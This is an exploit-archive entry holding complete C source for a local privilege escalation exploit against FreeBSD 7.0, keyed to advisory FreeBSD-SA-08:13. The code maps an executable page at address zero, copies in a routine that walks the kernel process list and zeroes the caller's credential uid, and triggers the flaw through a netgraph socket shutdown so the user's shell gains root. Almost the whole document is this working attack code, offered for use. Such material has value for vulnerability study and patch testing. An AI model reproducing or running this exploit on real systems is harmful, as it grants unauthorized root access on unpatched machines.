Local FreeBSD 7.0 Protosw Local Privilege Escalation Exploit

[AKella]

FreeBSD 7.0 Protosw Local Privilege Escalation Exploit

Цель: FreeBSD 7.0
Воздействие: Повышение привилегий

/*
* This is a quick and very dirty exploit for the FreeBSD protosw vulnerability
* defined here: 
* http://security.freebsd.org/advisories/FreeBSD-SA-08:13.protosw.asc
*
* This will overwrite your credential structure in the kernel. This will 
* affect more than just the exploit's process, which is why this doesn't
* spawn a shell. When the exploit has finished, your login shell should
* have euid=0. 
*
* Enjoy, and happy holidays!
*  - Don "north" Bailey (don.bailey@gmail.com) 12/25/2008
*/

#include <sys/mman.h>
#include <sys/time.h>
#include <sys/stat.h>
#include <sys/proc.h>
#include <sys/types.h>
#include <sys/param.h>
#include <sys/socket.h>
#include <netgraph/ng_socket.h>
#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
#include <errno.h>

#define PAGES 1
#define PATTERN1 0x8f8f8f8f
#define PATTERN2 0x6e6e6e6e

typedef unsigned long ulong;
typedef unsigned char uchar;

int
x(void)
{
    struct proc * p = (struct proc * )PATTERN1;
    uint * i;

    while(1)
    {
        if(p->p_pid == PATTERN2)
        {
            i = (uint * )p->p_ucred;
            *++i = 0;
            break;
        }

        p = p->p_list.le_next;
    }

    return 1;
}

int
main(int argc, char * argv[])
{
    ulong addr;
    uchar * c;
    uchar * d;
    uint * i;
    void * v;
    int pid;
    int s;

    if(argc != 2)
    {
        fprintf(stderr, "usage: ./x <allproc>\n");
        return 1;
    }

    addr = strtoul(argv[1], 0, 0);

    v = mmap(
        NULL,
        (PAGES*PAGE_SIZE),
        PROT_READ|PROT_WRITE|PROT_EXEC, 
        MAP_ANON|MAP_FIXED, 
        -1, 
        0);
    if(v == MAP_FAILED)
    {
        perror("mmap");
        return 0;
    }

    c = v;
    d = (uchar * )x;
    while(1)
    {
        *c = *d;
        if(*d == 0xc3)
        {
            break;
        }

        d++;
        c++;
    }

    *c++ = 0xc3;

    c = v;
    while(1)
    {
        if(*(long * )c == PATTERN1)
        {
            *(c + 0) = addr >>  0;
            *(c + 1) = addr >>  8;
            *(c + 2) = addr >> 16;
            *(c + 3) = addr >> 24;
            break;
        }
        c++;
    }

    pid = getpid();
    while(1)
    {
        if(*(long * )c == PATTERN2)
        {
            *(c + 0) = pid >>  0;
            *(c + 1) = pid >>  8;
            *(c + 2) = pid >> 16;
            *(c + 3) = pid >> 24;
            break;
        }
        c++;
    }

    s = socket(PF_NETGRAPH, SOCK_DGRAM, NG_DATA);
    if(s < 0)
    {
        perror("socket");
        return 1;
    }

    shutdown(s, SHUT_RDWR);

    return 0;
}